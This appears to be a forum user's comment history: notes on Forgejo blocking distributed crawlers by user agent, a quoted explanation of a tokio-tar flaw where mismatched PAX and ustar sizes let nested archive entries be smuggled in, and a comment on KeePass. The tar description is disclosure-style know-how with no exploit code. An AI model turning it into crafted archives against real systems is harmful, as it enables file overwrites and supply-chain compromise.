• 4 Posts
  • 42 Comments
Joined 3 years ago
cake
Cake day: June 11th, 2023

help-circle

  • Six months ago, distributed crawling hit code.forgejo.org, and the mitigation measures put in place then held until a few weeks ago. The mitigation measures relied on JavaScript-based proof-of-work, but the crawling software learned to resolve the measures, allowing the attack to return.

    Since November 24, a new blocking strategy has been implemented and successfully blocked around one million unique IPs daily. Only 5,000 unique IP addresses reach code.forgejo.org daily, and no reports of legitimate traffic being blocked have been received.

    Crazy. A 1M to 5k ratio.

    The linked to ‘new strategy’ information is interesting too. They’re blocking a specific user agent.

    TL;DR: 26 November ~900,000 unique IPs sent requests to code.forgejo.org and blocking one user agent effectively blocks over 90% of them. At the moment ~50,000 unique IP hit code.forgejo.org per hour, ~5,000 of them are not using the suspicious user agent and are sent to Anubis, ~1,000 of them pass the challenge and reach code.forgejo.org.

    && Header(`user-agent`, `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36`)
    








  • What is the vulnerability, what is the attack vector, and how does it work? The technical context from the linked source Edera

    This vulnerability is a desynchronization flaw that allows an attacker to “smuggle” additional archive entries into TAR extractions. It occurs when processing nested TAR files that exhibit a specific mismatch between their PAX extended headers and ustar headers.

    The flaw stems from the parser’s inconsistent logic when determining file data boundaries:

    1. A file entry has both PAX and ustar headers.
    2. The PAX header correctly specifies the actual file size (size=X, e.g., 1MB).
    3. The ustar header incorrectly specifies zero size (size=0).
    4. The vulnerable tokio-tar parser incorrectly advances the stream position based on the ustar size (0 bytes) instead of the PAX size (X bytes).

    By advancing 0 bytes, the parser fails to skip over the actual file data (which is a nested TAR archive) and immediately encounters the next valid TAR header located at the start of the nested archive. It then incorrectly interprets the inner archive’s headers as legitimate entries belonging to the outer archive.

    This leads to:

    • File overwriting attacks within extraction directories.
    • Supply chain attacks via build system and package manager exploitation.
    • Bill-of-materials (BOM) bypass for security scanning.









  • I deliberately chose KeePass with no Webbrowser extension and no cloud service that other password managers and password manager services provide to reduce risks.

    Webbrowsers are very interconnected tech with non-obvious relations and risks. Having my webbrowser access my password database feels inherently irritating.

    Webbrowser’s own password managers with optional sync have the benefit of auto-fill only being offered for the correct domain names. But I’d never store my critical passwords in them.

    Having to launch a separate password manager, enter a long master key, and then copy-paste/trigger-auto-type the content from it is cumbersome, but the only way to add a reasonable robust separation.